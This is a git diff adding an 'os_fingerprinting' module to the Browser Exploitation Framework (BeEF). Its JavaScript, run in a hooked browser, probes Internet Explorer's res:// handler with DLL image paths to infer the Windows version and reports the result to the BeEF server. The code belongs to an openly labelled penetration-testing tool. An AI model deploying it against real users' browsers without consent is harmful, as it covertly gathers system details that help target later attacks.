Add os_fingerprinting module

modules/host/os_fingerprinting/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var os_version = new Array;
+	var dom = document.createElement('b');
+
+	Array.prototype.unique = function() {
+		var o = {}, i, l = this.length, r = [];
+		for(i=0; i<l;i+=1) o[this[i]] = this[i];
+		for(i in o) r.push(o[i]);
+		return r;
+	};
+
+	parse_os_details = function() {
+		if (!os_version.length) os_version[0] = "unknown";
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "windows_nt_version="+os_version.unique());
+	};
+
+	// OS fingerprints // in the form of: "URI","NT version(s)"
+	var fingerprints = new Array(
+		new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"),
+		new Array("5.1+","res://wmploc.dll/257/album_0.png"),
+		new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"),
+		new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"),
+		new Array("6.0+","res://wdc.dll/error.gif")
+	);
+
+	for (var i=0; i<fingerprints.length; i++) {
+		var img    = new Image;
+		img.name   = fingerprints[i][0];
+		img.src    = fingerprints[i][1];
+		img.onload = function() { os_version.push(this.name); dom.removeChild(this); }
+		dom.appendChild(img);
+	}
+
+	setTimeout('parse_os_details();', 2000);
+
+});
+

modules/host/os_fingerprinting/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        os_fingerprinting:
+            enable: true
+            category: "Host"
+            name: "Fingerprint Operating System"
+            description: "This module attempts to fingerprint the Windows Operating System version using the 'res' protocol handler for Internet Explorer. It loads images from DLLs specific to different versions of Windows. This method does not rely on JavaScript objects which may have been modified by the user or browser compatibility mode."
+            authors: ["bcoles"]
+            target:
+                working: IE
+                not_working: ALL

modules/host/os_fingerprinting/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Uses methods described here:
+# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
+
+class Os_fingerprinting < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['windows_nt_version'] = @datastore['windows_nt_version'] if not @datastore['windows_nt_version'].nil?
+    if content.empty?
+      content['fail'] = 'Failed to fingerprint Windows version.'
+    end
+    save content
+  end
+
+end